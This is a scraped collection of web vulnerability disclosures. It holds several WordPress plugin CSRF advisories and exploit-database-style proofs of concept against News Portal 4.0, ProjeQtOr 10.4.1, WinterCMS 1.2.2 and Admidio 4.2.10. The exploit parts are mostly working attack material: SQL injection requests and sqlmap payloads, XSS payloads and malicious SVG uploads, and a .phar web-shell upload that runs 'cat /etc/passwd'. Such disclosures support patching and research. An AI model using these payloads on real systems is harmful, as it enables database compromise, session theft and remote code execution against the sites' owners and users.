Cross-Site Request Forgery (CSRF) vulnerability in Faboba Falang multilanguage for WordPress plugin <= 1.3.39 versions.

**Solution**

 Fixed

Update the WordPress Falang multilanguage plugin to the latest available version (at least 1.3.40).

Skalucy discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Falang multilanguage Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 1.3.40.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-37968: WordPress Falang multilanguage plugin <= 1.3.39 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in HasThemes ShopLentor plugin <= 2.6.2 versions.

**Solution**

 Fixed

Update the WordPress WooLentor plugin to the latest available version (at least 2.6.3).

Muhammad Daffa discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress WooLentor Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 2.6.3.

**Other vulnerabilities in this plugin**

 0 present

 5 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2022-47172: WordPress ShopLentor plugin <= 2.6.2 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

News Portal version 4.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized)# Date: 09/07/2023# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643# Version: 4.0# We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example  1-----------------------------------------------------------------------------------------------------------------------Param: name, email, comment-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/news-details.php?nid=13 HTTP/1.1Origin: http://127.0.0.1Sec-Fetch-User: ?1Host: 127.0.0.1:80Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Accept-Encoding: gzip, deflateSec-Fetch-Site: same-originsec-ch-ua-mobile: ?0Content-Length: 277Sec-Fetch-Mode: navigateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Connection: closeReferer: http://127.0.0.1/newsportal/news-details.php?nid=13Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua-platform: "Windows"Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedsec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Fetch-Dest: documentcsrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 10:55:26 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 146161<script>alert('comment successfully submit. Comment will be display after admin review ');</script><!DOCTYPE html><html lang="en">  <head>    <meta charset="utf-8">    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">    <meta name="description" content="">    <meta name="author" content="">    <title>News Portal | Home Page  [...]-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/news-details.php?nid=13 HTTP/1.1Origin: http://127.0.0.1Sec-Fetch-User: ?1Host: 127.0.0.1:80Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Accept-Encoding: gzip, deflateSec-Fetch-Site: same-originsec-ch-ua-mobile: ?0Content-Length: 276Sec-Fetch-Mode: navigateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Connection: closeReferer: http://127.0.0.1/newsportal/news-details.php?nid=13Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua-platform: "Windows"Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedsec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Fetch-Dest: documentcsrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 10:56:06 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 525Connection: closeContent-Type: text/html; charset=UTF-8<br /><b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21Stack trace:#0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...')#1 {main}  thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />w-----------------------------------------------------------------------------------------------------------------------SQLMap example param 'comment':-----------------------------------------------------------------------------------------------------------------------sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests:---Parameter: #2* ((custom) POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit=---web application technology: PHP 8.1.17, Apache 2.4.56bacck-end DBMS: MySQL >= 5.0 (MariaDB fork)## Example 2 - login to administration panel-----------------------------------------------------------------------------------------------------------------------Param: username-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/admin/ HTTP/1.1Host: 127.0.0.1Content-Length: 42Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/newsportal/admin/Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8Connection: closeusername=admin'&password=Test%40123&login=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 11:00:53 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 505Connection: closeContent-Type: text/html; charset=UTF-8<br /><b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13Stack trace:#0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...')#1 {main}  thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br />-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/admin/ HTTP/1.1Host: 127.0.0.1Content-Length: 43Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/newsportal/admin/Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8Connection: closeusername=admin''&password=Test%40123&login=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 11:02:15 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 4733Connection: closeContent-Type: text/html; charset=UTF-8<script>alert('Invalid Details');</script><!DOCTYPE html><html lang="en">    <head>        <meta charset="utf-8">        <meta name="viewport" content="width=device-width, initial-scale=1.0">        <meta name="description" content="News Portal.">        <meta name="author" content="PHPGurukul">                <title>News Portal | Admin Panel</title>[...]

News Portal 4.0 SQL Injection

ProjeQtOr Project Management System version 10.4.1 suffers from multiple cross site scripting vulnerabilities.

    Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSSVersion: V10.4.1Bugs:  Multiple XSSTechnology: PHPVendor URL: https://www.projeqtor.orgSoftware Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.4.1.zip/downloadDate of found: 09.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC                                     ### XSS-1 ### visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken=payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E                                    ### XSS-2 ###steps: 1. login to account2. go projects and create project3.add attachment3. upload svg file"""<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>"""4. Go to  svg file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg )                                       ### XSS-3 ###Go to below adress (post request)POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1Host: localhostContent-Length: 35sec-ch-ua: Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36sec-ch-ua-platform: ""Accept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/projeqtor/view/main.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3Connection: closeresultAck=<script>alert(4)</script>

ProjeQtOr Project Management System 10.4.1 Cross Site Scripting

WinterCMS versions prior to 1.2.3 suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting# Exploit Author: abhishek morla# Google Dork: N/A# Date: 2023-07-10# Vendor Homepage: https://wintercms.com/# Software Link: https://github.com/wintercms/winter# Version: 1.2.2# Tested on: windows64bit / mozila firefox # CVE : CVE-2023-37269# Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3# Video POC : https://youtu.be/Dqhq8rdrcqcTitle : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload FunctionalityDescription :WinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to a Persistent cross-site scripting (XSS) attack. This vulnerability arises from the ability of an attacker to embed malicious JavaScript content within an SVG file, which remains visible to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger the execution of the malicious scriptPayload:- // image.svg<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.cookie);   </script></svg>//Post RequestPOST /backend/system/settings/update/winter/backend/branding HTTP/1.1Host: 172.17.0.2User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cacheX-Requested-With: XMLHttpRequestX-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2X-WINTER-REQUEST-HANDLER: formLogo::onUploadContent-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206Content-Length: 608Origin: http://172.17.0.2Connection: closeCookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D-----------------------------186411693022341939203410401206Content-Disposition: form-data; name="file_data"; filename="image.svg"Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.domain);   </script></svg>-----------------------------186411693022341939203410401206--|-----------------------------------------EOF-----------------------------------------

WinterCMS 1.2.2 Cross Site Scripting

Admidio version 4.2.10 suffers from a remote code execution vulnerability.

    Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE)Application: AdmidioVersion: 4.2.10Bugs:  RCETechnology: PHPVendor URL: https://www.admidio.org/Software Link: https://www.admidio.org/download.phpDate of found: 10.07.2023Author: Mirabbas AğalarovTested on: Linux2. Technical Details & POC========================================Steps:1. Login to account2. Go to Announcements3. Add Entry4. Upload .phar file in image upload section..phar file Content<?php echo system('cat /etc/passwd');?>5. Visit .phar file  ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar )Request:POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1Host: localhostContent-Length: 378Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=AnnouncementsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MBConnection: close------WebKitFormBoundaryne9TRuC1tAqhR86rContent-Disposition: form-data; name="upload"; filename="shell.phar"Content-Type: application/octet-stream<?php echo system('cat /etc/passwd');?>------WebKitFormBoundaryne9TRuC1tAqhR86rContent-Disposition: form-data; name="ckCsrfToken"o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB------WebKitFormBoundaryne9TRuC1tAqhR86r--

Admidio 4.2.10 Remote Code Execution

The WooCommerce Google Sheet Connector WordPress plugin through 1.3.4 does not have CSRF check when updating its Access Code, which could allow attackers to make logged in admin change the access code to an arbitrary one via a CSRF attack

CVE-2023-2329

The Caldera Forms Google Sheets Connector WordPress plugin through 1.2 does not have CSRF check when updating its Access Code, which could allow attackers to make logged in admin change the access code to an arbitrary one via a CSRF attack

CVE-2023-2330

Cross-Site Request Forgery (CSRF) vulnerability in Ultimate Member plugin <= 2.6.0 versions.

**Solution**

 Fixed

Update the WordPress Ultimate Member plugin to the latest available version (at least 2.6.1).

Nguyen Xuan Chien discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Ultimate Member Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 2.6.1.

**Other vulnerabilities in this plugin**

 0 present

 23 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-31216: WordPress Ultimate Member plugin <= 2.6.0 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

The POST SMTP Mailer WordPress plugin before 2.5.7 does not have proper CSRF checks in some AJAX actions, which could allow attackers to make logged in users with the manage_postman_smtp capability resend an email to an arbitrary address (for example a password reset email could be resent to an attacker controlled email, and allow them to take over an account).

Tag

#csrf